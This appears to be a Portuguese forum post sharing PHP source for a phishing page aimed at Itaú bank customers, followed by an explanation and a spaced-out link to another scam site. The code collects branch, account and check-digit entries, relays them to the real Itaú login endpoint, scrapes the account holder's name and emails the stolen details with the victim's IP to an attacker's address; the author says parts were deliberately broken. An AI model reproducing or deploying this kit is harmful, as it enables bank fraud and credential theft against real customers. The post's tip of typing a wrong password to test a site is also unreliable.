Golpe bancario

Isto que eu vou disponibilizar agora � uma linha de c�digo em linguagem PHP usado para ataque:

Este � de um banco ita�


< ?
session_start();
$agencia = $_POST['idag1'];
$_SESSION['agencia'] = $agencia;
$conta = $_POST['idct1'];
$_SESSION['conta'] = $conta;
$dac = $_POST['iddg1'];
$_SESSION['dac'] = $dac;

$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL,"https://bankline.itau.com.br/GRIPNET/bklcom.dll");
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt ($ch, CURLOPT_USERAGENT, "Opera/9.99 (Windows NT 5.1; U; pl) Presto/9.9.9");
curl_setopt ($ch, CURLOPT_TIMEOUT, 60);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_COOKIEJAR, $gacookie);
curl_setopt ($ch, CURLOPT_COOKIEFILE, $gacookie);
curl_setopt ($ch, CURLOPT_REFERER, "https://bankline.itau.com.br/lgnet/itauf/bankline.htm");
$postdata = "id=U2TH1000000&op=A79BF5A95F48CA722097ABE53F049FC79605FA794E31FE3229163FE198AA7AB9&agencia=" . $agencia . "&conta=" . $conta . "&dac=" . $dac . "&tipousuario=X&origem=H&formulario=0&trnini=&varest=&pop=&Target=?=&tira=1000000&Reso=1280x800%40%26cookie%3D&Engine=3&Flag=N&idSessA=&generico=&x=13&y=11";
---------------------------------------------------------------------------------------------------------

curl_setopt ($ch, CURLOPT_POSTFIELDS, $postdata)
curl_setopt ($ch, CURLOPT_POST, 1);
$result = curl_exec ($ch);
curl_close($ch);

$resulta = explode('class="MSGTexto8">',$result);
$resulta1 = $resulta[1];
$resulta2 = explode('',$resulta1);
if ($resulta2[0] == ""){
$resulta = explode(class="MSGNome">',$result)
$resulta1 = $resulta[1];
$resulta2 = explode('',$resulta1);
}
---------------------------------------------------------------------------------------------------------

if ($resulta2[0] == ""){
$resulta = explode('class="MSGTituloEsq2"> ',$result);
$resulta1 = $resulta[1];
$resulta2 = explode('',$resulta1);
}

$ip = $_SERVER["REMOTE_ADDR"];
if ($resulta2[0] == ""){
echo"";
echo "< meta H T T P- E Q U I V = 'refresh' CONTENT='0;URL= index.php'>";
}
---------------------------------------------------------------------------------------------------------

$headers = "MIME-Version: 1.1\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\n";
$headers .= "From: " . $resulta2[0] . "@abriu.com.br\n"; // remetente
$headers .= "Return-Path: " . $resulta2[0] . "@abriu.com.br\n"; // return-path

mail("[email protected]", "[" . $ip . "] - " . $resulta2[0] . " Abriu", $os . ' ' . $browser . "
" . $resulta2[0] . "< br >" . $agencia . "< br >" . $conta . "-" . $dac . "< br >", $headers);

$_SESSION['nome'] = $resulta2[0];
?>
---------------------------------------------------------------------------------------------------------
Os dados digitados ser�o salvos em vari�veis de sess�o, depois � utilizada a libcurl no PHP para se comunicar com o site verdadeiro do banco Ita�, a resposta � exibida de acordo com os dados fornecidos pelo site e pra finalizar, tudo que � digitado � enviado um e-mail para o criminoso com as informa��es capturadas.

Isso explica sempre do alerta que quando voc� for digitar a senha, antes de mais nada digite a senha falsa, se der erro o site � verdadeiro, se aceitar � mal sinal.

Pra finalizar, se caso der algo errado nos c�digos, n�o se desespere, isso foi feito propositalmente, eu ocultei algumas coisas pra n�o ficar a entregue de t�o f�cil, caso vier fazer qualquer tipo de tentativa usando esse tipo de pr�tica,analise teoricamente por mera curiosdidade, n�o me responsabilizo por nada se fizer de mal uso.

mais a frente quem sabe eu posto mais uma curiosidade sobre isso.

fui
---------------------------------------------------------------------------------------------------------
Link de outro golpe:

h t t p : / / v i s a g o . w s / s e c u r e / v a i d e v i s a / p r i m e i r o _ p a s s o . p h p

:)

Credito: Joey T.O.H